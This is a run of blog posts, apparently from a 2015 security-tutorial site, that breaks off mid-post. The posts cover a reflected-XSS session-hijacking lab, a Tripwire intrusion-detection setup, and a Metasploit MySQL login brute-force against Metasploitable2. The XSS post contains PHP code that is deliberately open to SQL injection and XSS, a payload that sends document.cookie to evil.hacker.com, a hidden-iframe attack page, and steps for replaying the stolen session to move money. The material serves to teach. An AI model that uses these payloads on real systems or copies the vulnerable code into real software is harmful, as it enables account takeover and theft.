<?php<br />session_start();<br /><br />if(!isset($_SESSION['loginid'])){<br /> echo "please login";<br />}else{ <br /><br /><br />$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />if($conn->connect_error){<br /> die("connect error" . $conn->connect_error);<br />}<br /><br />$sql = "select * from customer";<br />$result = $conn->query($sql);<br /><br />if($result->num_rows > 0){<br /><br /> echo '<table>';<br /> echo '<tr><th>Login ID</th><th>Cust Name</th><th>Account No </th><th> Balance</th><th>Address</th><th>Mobile</th></tr>';<br /> while($row = $result->fetch_assoc()){<br /> echo "<tr><td><strong>" . $row['loginid'] . "</strong></td>";<br /> echo "<td>" . $row['custname'] . "</td>";<br /> echo "<td>" . $row['accountno'] . "</td>";<br /> echo "<td>" . $row['balance'] . "</td>";<br /> echo "<td>" . $row['address'] . "</td>";<br /> echo "<td>" . $row['mobile'] . "</td> </tr>";<br /> }<br /> echo '</table>';<br /><br />}else{<br /> echo "0 results";<br />}<br /><br />$conn->close();<br />}<br /><br />?><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-45374956238706470682015-06-10T18:46:00.000+05:302015-06-20T23:05:28.370+05:30Session Hijacking Using Reflected XSS: Example Application<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Session hijacking occurs when an attacker captures a session token and injects it into their own browser to gain access to the victim's authenticated session.<br />
<br />
There are some limitations of session hijacking attacks:<br />
1) Stealing cookies is useless if the target is using <span style="color: red;">https://</span> for browsing.<br />
2) Most cookies expire when the target logs out of a session. This also logs the attacker out of the session.<br />
3) Many websites do not support parallel logins, which negates the use of a stolen cookie.<br />
<br />
In this tutorial, we will see how to steal session cookie using Reflected Cross-Site Scripting Attack.<br />
<br />
Cross-site scripting (XSS) is a vulnerability that permits an attacker
to inject code (typically HTML or Javascript) into contents of a
website not under the attacker's control. When a victim views such a
page, the injected code executes in the victim's browser. Thus, the
attacker has bypassed the
browser's <a href="http://www.google.com/search?q=same+origin+policy">same
origin policy</a> and can steal victim's private information
associated with the website in question.
<br />
In a <b>reflected XSS</b> attack, the attack is in the request itself
(frequently the URL) and the vulnerability occurs when the server
inserts the attack in the response verbatim or incorrectly escaped or
sanitized. The victim triggers the attack by browsing to a malicious
URL created by the attacker.<br />
<br />
We develop a web application which has a reflected XSS vulnerability. When a user logs into the application, a session is created for him. The attacker creates a malicious URL to exploit the XSS vulnerability and capture the session token of the logged in user.<br />
<br />
<br />
Web Server Name: meru.mycompany.com<br />
Attacker Machine : evil.hacker.com <br />
<br />
<br />
1) Log in to the application by viewing the URL <span style="color: red;">http://meru.mycompany.com/login.html</span>. Enter username and password. On successful authentication, a session is created for the user. And the user is redirected to the URL <span style="color: red;">http://meru.mycompany.com/search.php</span>. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s1600/Screenshot+from+2015-06-09+23%253A02%253A47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s640/Screenshot+from+2015-06-09+23%253A02%253A47.png" width="640" /></a></div>
<br />
<br />
<br />
<span style="color: red;">login.php</span><br />
<?php<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
if(isset($_POST['submit'])){<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
<br />
$sql = "select loginid,passwd,custname from customer where loginid = '$loginid' and passwd = '$passwd'";<br />
<br />
$result = $conn->query($sql);<br />
<br />
if ($result->num_rows == 1){<br />
$row = $result->fetch_assoc();<br />
$custname = $row['custname'];<br />
<br />
session_start();<br />
$_SESSION['loginid'] = $loginid;<br />
$_SESSION['custname'] = $custname;<br />
<br />
header('Location: search.php');<br />
}<br />
$error_msg="invalid username or password.\n";<br />
<br />
$conn->close();<br />
}<br />
}<br />
?><br />
<br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<h2>Enter login details</h2><br />
<?php<br />
if(! empty($error_msg)){<br />
echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
?><br />
<br />
<form action="login.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="text" name="passwd" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<br />
<br />
<br />
2) The page 'search.php' contains reflected XSS vulnerability. The application simply copies the search keyword into the output as shown below. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxhMpWUi0RD-_ZTyEpZME8CFBxurhbeTKHNjj2iSwiCMwr5w22Ut2YoHiAkXnK4eDzNUndDCE2CR0NWwovWICXczvdupHVdtswahZ24hOu9QDtjEgTVOb81uE0SOFVee2eDjJIH9pK0s1/s1600/Screenshot+from+2015-06-09+23%253A06%253A41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxhMpWUi0RD-_ZTyEpZME8CFBxurhbeTKHNjj2iSwiCMwr5w22Ut2YoHiAkXnK4eDzNUndDCE2CR0NWwovWICXczvdupHVdtswahZ24hOu9QDtjEgTVOb81uE0SOFVee2eDjJIH9pK0s1/s640/Screenshot+from+2015-06-09+23%253A06%253A41.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujBYxolXqn16Q6hXH5SWlP5V4nDzzMPnQ3OJlsPSPZD4paikUA_UTZsM3Ks44dOhSogg4EMJX8ebqL_EJni9LrHEN_DckJl_0qxpAMlKv_fmbKfz8-OXoyVOoollIcP301P_nvjKsdAq-/s1600/Screenshot+from+2015-06-09+23%253A07%253A48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujBYxolXqn16Q6hXH5SWlP5V4nDzzMPnQ3OJlsPSPZD4paikUA_UTZsM3Ks44dOhSogg4EMJX8ebqL_EJni9LrHEN_DckJl_0qxpAMlKv_fmbKfz8-OXoyVOoollIcP301P_nvjKsdAq-/s640/Screenshot+from+2015-06-09+23%253A07%253A48.png" width="640" /></a></div>
This behavior of taking user-supplied input and inserting it into the
HTML of the server's response is one of the signatures of reflected XSS
vulnerabilities. <br />
<br />
<span style="color: red;">search.php</span><br />
<?php<br />
session_start();<br />
?><br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<br />
<?php<br />
if(!isset($_SESSION['loginid'])){<br />
echo "please login";<br />
<br />
} else{<br />
if(isset($_GET['submit'])){<br />
<br />
$item = $_GET['item'];<br />
echo "You searched for " . $item . "<br/>";<br />
<br />
} else{<br />
?><br />
<br />
<h2>Enter Search Item </h2><br />
<br />
<form action="search.php" method="get"><br />
<br />
<label>Search Keyword:</label><br />
<input type="text" name="item" /> <br/><br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
<br />
<?php<br />
}<br />
}<br />
?><br />
<br />
</body><br />
</html><br />
<br />
<br />
<br />
3) If we enter the following Javascript as the search keyword <span style="color: red;">car<script>alert(document.cookie)</script></span>.<br />
<br />
Then we get a pop up dialog displaying the session id as shown below.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4du0LeouSeVXc4eG6CLZLrCkRIzYRqThMIkPb0KsCSMHXcF88xbMFA5_jKCnNdAGPFivWFkDoCBNBbkrnLf3gFjZ1cfU_qwXngze8apdNjxwKibZXbRMbx5DLfQxvGx81v-00JKVmGf4E/s1600/Screenshot+from+2015-06-09+23%253A11%253A24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4du0LeouSeVXc4eG6CLZLrCkRIzYRqThMIkPb0KsCSMHXcF88xbMFA5_jKCnNdAGPFivWFkDoCBNBbkrnLf3gFjZ1cfU_qwXngze8apdNjxwKibZXbRMbx5DLfQxvGx81v-00JKVmGf4E/s640/Screenshot+from+2015-06-09+23%253A11%253A24.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
4) Through some means, the attacker feeds the following URL to the user. <span style="color: red;"><br /></span><br />
<span style="color: red;">http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/xss.php"%2bdocument.cookie;</script>&submit=submit</span><br />
<br />
The user requests from the application the URL fed to him by the attacker.<br />
<br />
Because of the XSS vulnerability, the server's response contains the javascript the attacker created.<br />
<br />
The user's browser executes the attacker's javascript . The malicious javascript created by the attacker is:<br />
<br />
<span style="color: red;">var i=new Image; i.src="http://evil.hacker.com/xss.php"+document.cookie</span> <br />
<br />
This code causes the user's browser to make a request to 'evil.hacker.com'. The request contains the user's session token for the application. <br />
<br />
<div style="text-align: left;">
Note that the victim does not even need to explicitly click on the
malicious link. Suppose the attacker
owns '<i>evil.hacker.com</i>' and creates a page '<i>attack.php'</i> with an
<span style="font-family: inherit;"><code><iframe></code></span> pointing to the malicious link; if the
victim visits <i>'<span style="color: red;">http://evil.hacker.com/attack.php</span>'</i><code></code>, the attack will
silently be activated. </div>
<div style="text-align: left;">
<br />
<html><br /><body><br /><iframe height="0" width="0" src=<span style="color: red;">'http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/"%2bdocument.cookie;</script>&submit=submit</span>'></iframe><br /></body><br /></html><br />
<br /></div>
<br />
5) The attacker on 'evil.hacker.com' runs '<span style="color: red;">Wireshark</span>' and captures the session token as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s1600/Screenshot+from+2015-06-11+14%253A04%253A01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s640/Screenshot+from+2015-06-11+14%253A04%253A01.png" width="640" /></a></div>
<br />
<br />
6) Now the attacker has to insert this session token in a cookie in his
browser and hijack the user session. The attacker will perform the following steps:<br />
<br />
6.1) Open Firefox Web Browser. Install <span style="color: red;">Grease Monkey</span> Firefox extension<br />
<br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" rel="nofollow">https://addons.mozilla.org/en-US/firefox/addon/greasemonkey</a><a href="http://dustint.com/post/12/cookie-injection-using-greasemonkey" rel="nofollow"><br /></a><br />
<br />
6.2) Install <span style="color: red;">Cookie Injector</span> script in Grease Monkey.<br />
<br />
<a href="http://userscripts-mirror.org/scripts/show/119798" rel="nofollow">http://userscripts-mirror.org/scripts/show/119798</a><br />
<br />
<a href="http://dustint.com/post/12/cookie-injection-using-greasemonkey" rel="nofollow">http://dustint.com/post/12/cookie-injection-using-greasemonkey</a><br />
<br />
6.1) Copy the session token from 'Wireshark' output. Right click on <b>Request URI</b>. Select <b>Copy</b> -> <b>Bytes</b> -> <b>Printable Text Only</b>. Then paste in 'gedit' text editor as shown below:<br />
<br />
<span style="color: red;">/xss.php?c=PHPSESSID%3Dnef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.2) Edit the copied text as shown below.<br />
<br />
<span style="color: red;">Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.3) Copy the above line.<br />
<br />
6.4) Start Firefox web browser. Press <b>Alt+C</b> to open the Cookie Injector dialog. Paste the above copied line and click <b>OK</b> as shown below.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgrPblfz2tAxQflFOTWHan1jo6iqUSbICZLl-jd9d-Mo_bKhxoPmkojoOiMTP14uO5T6kZWUgC4ZiFpwTkTraJoSgIt8WljQiGtIN76fmJYCszOM9bTratS4OEQgDEzOkg-Obt_da7CBMO/s1600/Screenshot+from+2015-06-11+14%253A06%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgrPblfz2tAxQflFOTWHan1jo6iqUSbICZLl-jd9d-Mo_bKhxoPmkojoOiMTP14uO5T6kZWUgC4ZiFpwTkTraJoSgIt8WljQiGtIN76fmJYCszOM9bTratS4OEQgDEzOkg-Obt_da7CBMO/s640/Screenshot+from+2015-06-11+14%253A06%253A08.png" width="640" /></a></div>
<br />
<br />
6.5) The session has been hijacked. The attacker accesses the URL <span style="color: red;">http://meru.mycompany.com/transfer.php</span> and transfers money from the victim's account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s1600/Screenshot+from+2015-06-11+14%253A07%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s640/Screenshot+from+2015-06-11+14%253A07%253A28.png" width="640" /></a></div>
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-90242114325854818972015-06-09T10:51:00.000+05:302015-06-21T21:36:17.193+05:30Host based IDS: Tripwire in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
<div data-angle="0" data-canvas-width="661.7660742483662" data-font-name="Helvetica" style="font-family: sans-serif; font-size: 19.8008px; left: 143.175px; position: absolute; top: 548.329px; transform-origin: 0% 0% 0px; transform: rotate(0deg) scale(0.84064, 1);">
<div data-angle="0" data-canvas-width="661.7660742483662" data-font-name="Helvetica" style="font-family: sans-serif; font-size: 19.8008px; left: 143.175px; position: absolute; top: 548.329px; transform-origin: 0% 0% 0px; transform: rotate(0deg) scale(0.84064, 1);">
<br />
<br /><br />
<br /><br />
</div>
</div>
<br />
<br />
Host-based IDSes mainly rely on integrity checking. Integrity
checking involves the creation of a protected database of checksums,
hashes, and other attributes of a host's critical system files. The
integrity checker periodically checks those files against the database.
if a file has changed, an alert is logged. Both
Tripwire and AIDE are utilities used to monitor the integrity of files. They both create a secure password protected database of file and
directory attributes that is used to compare against the current files
and directories for changes. If files being
monitored are modified in any way, Tripwire and AIDE will notify
administrators.<br />
<br />
We will install and configure tripwire on the following machine:<br />
<br />
Server name :<span style="color: red;">meru.mycompany.com</span> <br />
Server IP Address: 192.168.122.1<br />
<br />
Perform the following steps:<br />
<br />
1) <span style="color: blue;">Install tripwire.</span> <br />
1.1) Install EPEL repository. <br />
[root@server1 ~]# <b>yum install epel-release</b><br />
<br />
1.2) Install tripwire from the EPEL repository.<b> </b><br />
[root@meru ~]# <b>yum --disablerepo=\* --enablerepo=epel install tripwire</b><br />
<br />
<br />
2) <span style="color: blue;">Create site and local passphrase.</span> <br />
The site passphrase is used to encrypt and sign the Tripwire
configuration and policy files. The local passphrase is used to encrypt and sign Tripwire's databases and reports. <br />
<br />
2.1) Create site passphrase 'site.key'.<br />
[root@meru ~]# <b>cd /etc/tripwire/</b><br />
[root@meru tripwire]#<b> twadmin --generate-keys --site-keyfile site.key</b><br />
Enter the site keyfile passphrase: <br />
Verify the site keyfile passphrase:<br />
Generating key (this may take several minutes)...<br />
Key generation complete.<br />
<br />
<br />
2.2) Create local passphrase 'meru.mycompany.com-local.key'.(In our case $HOSTNAME will expand to 'meru.mycompany.com')<br />
[root@meru tripwire]#<b> twadmin --generate-keys --local-keyfile $HOSTNAME-local.key</b><br />
Enter the local keyfile passphrase:<br />
Verify the local keyfile passphrase:<br />
Generating key (this may take several minutes)...<br />
Key generation complete.<br />
<br />
<br />
2.3) View the generated passphrases. <br />
[root@meru tripwire]# <b>ls</b><br />
<span style="color: red;">meru.mycompany.com-local.key site.key</span> twcfg.txt twpol.txt<br />
<br />
<br />
3) <span style="color: blue;">View and edit</span> <span style="color: blue;">configuration and policy file.</span> <br />
The configuration file 'twcfg.txt' controls basic characteristics of tripwire's
environment and behavior. The Policy file 'twpol.txt' determines what tripwire looks
for and how it reacts.<br />
<br />
3.1) View configuration settings in clear text configuration file '<span style="color: red;">twcfg.txt'</span>.<br />
<br /><br />
3.2) View the clear text policy file '<span style="color: red;">twpol.txt'</span>.<br />
<br />A Tripwire policy is a sequence of two kind of rules. Normal ones
define which properties of a file or directory tree must be checked,
in this format:<br />
<br />
<div class="programlisting" style="text-align: left;">
<span style="color: red;">object_name -> property_mask (attribute = value);
</span></div>
<i> </i><br />
Where,<br />
<i>object_name</i> is the Tripwire term for files and directories. <br />
<br />
<i>property_mask</i> is a series of file or directory properties to examine or
ignore for a given object. There are a number of predefined variables that describe common property masks such as ReadOnly, Dynamic, Growing, IgnoreNone, Device. <br />
<br />
Attributes provide additional, rule-specific information. There are 4 attributes: rulename, severity, emailto, recurse. <br />
<br />
The other kind of rules are stop points, which define an exception to a rule (tell Tripwire not
to scan a particular file or directory). <br />
<br />
For example,<br />
<span style="color: red;">/home/shabbir/www -> $(ReadOnly) (recurse=1) ; </span><br />
<br />
tells Tripwire to treat the first level of my WWW directory as read-only. recurse=1 means to check the dir down one level (the dir itself plus everything immediately below, but no further).<br />
<br />
<span style="color: red;">!/home/shabbir/www/guestbook.html ;</span><br />
<br />
<span style="color: red;"><span style="color: #444444;">is a stop point. Tells tripwire to ignore changes to the file guestbook.html.</span></span><br />
<span style="color: red;"><span style="color: #444444;"> </span> </span> <br />
<br />
4) <span style="color: blue;">Encrypt configuration and policy files.</span><br />
<br />
4.1) Encrypt cleartext configuration file 'twcfg.txt' using the site key to create encrypted binary config file 'tw.cfg'.<br />
[root@meru tripwire]# <b>twadmin --create-cfgfile --site-keyfile ./site.key twcfg.txt </b><br />
Please enter your site passphrase: <br />
Wrote configuration file: <span style="color: red;">/etc/tripwire/tw.cfg</span><br />
<br />
4.2) Encrypt cleartext policy file 'twpol.txt' using the site key to create encrypted binary policy file 'tw.pol'.<br />
[root@meru tripwire]# <b>twadmin --create-polfile --site-keyfile ./site.key twpol.txt </b><br />
Please enter your site passphrase: <br />
Wrote policy file: <span style="color: red;">/etc/tripwire/tw.pol</span><br />
<br />
<br />
NOTE: The reason
why the two files must be encrypted is that Tripwire will discover if they
are corrupted much more easily than if they were in plain-text format. You should delete the plain text versions after encrypting them. The plain text versions can be retrieved later by the commands:<br />
<span style="color: red;">twadmin --print-cfgfile > twcfg.txt</span><br />
<span style="color: red;">twadmin --print-polfile > twpol.txt</span><br />
<br />
<br />
5) <span style="color: blue;">Create (Initialize) the Database.</span><br />
<span style="color: black;">Tripwire reads the policy file, generates a database based on its contents, and then crypto‐graphically signs the resulting database. </span><span style="color: black;"><br /></span><br />
[root@meru tripwire]#<b> tripwire --init</b><br />
Wrote database file: <span style="color: red;">/var/lib/tripwire/meru.mycompany.com.twd</span><br />
The database was successfully generated.<br />
<br />
<br />
6) <span style="color: blue;">Run Periodic Checks.</span><br />
[root@meru tripwire]# <b>tripwire --check</b><br />
<br />
<br />
This compares all protected files against the hash database and prints a report both on the screen and to a binary file. The report will reside in '/var/lib/tripwire/report' with a time-date stamp appended to it's filename. The report can be viewed later with the command<br />
[root@meru tripwire]# <b>twprint --print-report --report-level 4 --twrfile /var/lib/tripwire/report/meru.mycompany.com-</b><b>20150608-154127.twr </b><br />
<br />
<br />
The generated report describes each policy file violation in detail, depending on whether the specified file system object was added, deleted, or changed. Each report item lists the properties of the object as it currently resides on the file system, and, if appropriate, the old value stored in the database.<br />
<br />
If there are differences between the database and the current system, the administrator can either fix the problem by <span style="color: red;">replacing the current file with the correct file</span> (e.g., an intruder replaced /bin/login), or <span style="color: red;">update the database to reflect the new file</span> (e.g., a fellow system administrator installed a new version of /usr/local/bin/emacs).<br />
<br />
7) <span style="color: blue;">Updating Tripwire's database after violations.</span><span style="color: #444444;"> </span><br />
<span style="color: #444444;">Running tripwire in Database Update mode allows any differences between the database and the current system to be reconciled. This will prevent the violation from showing up in future reports. If the reported change is unexpected and potentially malicious, then the changed file should be replaced with the original version. If there is a valid reason for the change, the database must be changed to match the current files. </span><br />
<br />
[root@meru tripwire]# <b>tripwire --update --twrfile /var/lib/tripwire/report/meru.mycompany.com-20150608-154127.twr</b><br />
<br />
Remove the "x" from the adjacent box to prevent updating the database with the new values for this object.<br />
Added:<br />
[x] "/home/shabbir/www"<br />
<br />
NOTE: <span style="color: red;">If the change is legitimate, leave the 'x' there. If it isn't , delete the 'x'. </span><br />
<br />
The second way to update the database is to run the check in interactive mode, which starts the update session after the check finishes. <br />
[root@meru tripwire]# <b>tripwire --check --interactive</b><br />
<br />
<br />
8) <span style="color: blue;">Changing Tripwire's Policy.</span><br />
<i>twadmin</i> command should be used to install only the initial policy, not updated policies. If you need to change your tripwire policy after the database has been initialized (i.e. after you've run tripwire --init), use the below commands to dump, edit and install it again.<br />
<br />
8.1) Generate the plain text version <br />
[root@meru tripwire]# <b>twadmin --print-polfile > twpol.txt</b><br />
<br />
8.2) Edit the plain text policy file<br />
[root@meru tripwire]# <b>vi twpol.txt </b><br />
<br />
8.3) Install the updated policy <br />
[root@meru tripwire]# <b>tripwire --update-policy twpol.txt <br /> </b><br />
Tripwire will parse the policy file, generate a new database, and compare all records that the new and old database have in common. If any of the common records don't match, tripwire will not update the database or the policy. <span style="color: red;">You will need to run a tripwire --check followed by --update (or --check --interactive). Then run the policy update again. </span><br />
<br />
<br />
9) <span style="color: blue;">Run automatic checking.</span><br />
A cron job has already been set up. The tripwire RPM installs the script
'/etc/cron.daily/tripwire-chec'. Tripwire will perform an
integrity check once every day, and the generated report will be
emailed to root.<br />
<br />
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-42421105112613499362015-06-07T11:18:00.000+05:302015-06-20T22:01:44.485+05:30Metasploitable2 : Hack MySQL Server using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
The Metasploitable virtual machine is an intentionally vulnerable
version of Ubuntu Linux designed for testing security tools and
demonstrating common vulnerabilities. This virtual machine is compatible
with VMWare, VirtualBox, and other common virtualization platforms.<br />
<br />
We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. <span style="color: black;">For Instructions on how to install Metasploitable 2 Virtual Machine in KVM</span>, refer to this <a href="http://linux-hacking-guide.blogspot.in/2015/05/convert-vmware-virtual-machine-to-kvm.html" target="_blank">post.</a><br />
<br />
In a <a href="http://linux-hacking-guide.blogspot.in/2015/05/metasploitable2-vulnerability-scanning.html" target="_blank">previous post </a>,
we carried out a Vulnerability Scan of the 'Metasploitable 2'
virtual machine using OpenVAS in Kali LInux. <br />
<br />
In this post, we will hack MySQL Server using Metasploit in Kali Linux. <br />
<br />
We have the following scenario:<br />
<br />
Metasploitable2 IP Address: 192.168.122.74<br />
Kali Linux IP Address: 192.168.122.115 <br />
<br />
Perform the following steps on the Kali Linux machine:<br />
<br />
1) We perform a port scan on the Metasploitable machine and see that the mysql port is open.<br />
root@kali:~# <b>nmap -p 3306 192.168.122.74</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST<br />
Nmap scan report for 192.168.122.74<br />
Host is up (0.00062s latency).<br />
PORT STATE SERVICE<br />
<span style="color: red;">3306/tcp open mysql</span><br />
MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
<br />
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds<br />
<br />
<br />
<br />
2) We will try to hack the password for 'root' user. We will try blank password and see if it works.<br />
<br />
root@kali:~# <b>msfconsole</b><br />
<br />
msf > <b>search mysql</b><br />
<br />
msf > <b>use auxiliary/scanner/mysql/mysql_login </b><br />
msf auxiliary(mysql_login) > <b>show options</b><br />
Module options (auxiliary/scanner/mysql/mysql_login):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
<span style="color: red;">BLANK_PASSWORDS false no Try blank passwords for all users</span><br />
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5<br />
DB_ALL_CREDS false no Try each user/password couple stored in the current database<br />
DB_ALL_PASS false no Add all passwords in the current database to the list<br />
DB_ALL_USERS false no Add all users in the current database to the list<br />
PASSWORD no A specific password to authenticate with<br />
PASS_FILE no File containing passwords, one per line<br />
Proxies no A proxy chain of format type:host:port[,type:host:port][...]<br />
<span style="color: red;"> RHOSTS yes The target address range or CIDR identifier</span><br />
RPORT 3306 yes The target port<br />
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host<br />
THREADS 1 yes The number of concurrent threads<br />
<span style="color: red;"> USERNAME no A specific username to authenticate as</span><br />
USERPASS_FILE no File containing users and passwords separated by space, one pair per line<br />
USER_AS_PASS false no Try the username as the password for all users<br />
USER_FILE no File containing usernames, one per line<br />
VERBOSE true yes Whether to print output for all attempts<br />
<br />
msf auxiliary(mysql_login) > <b>set RHOSTS 192.168.122.74</b><br />
RHOSTS => 192.168.122.74<br />
msf auxiliary(mysql_login) > <b>set USERNAME root</b><br />
USERNAME => root<br />
msf auxiliary(mysql_login) > <b>set BLANK_PASSWORDS true</b><br />
BLANK_PASSWORDS => true<br />
msf auxiliary(mysql_login) > <b>exploit</b><br />
<br />
[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a<br />
[!] No active DB -- Credential data will not be saved!<br />
[!] No active DB -- Credential data will not be saved!<br />
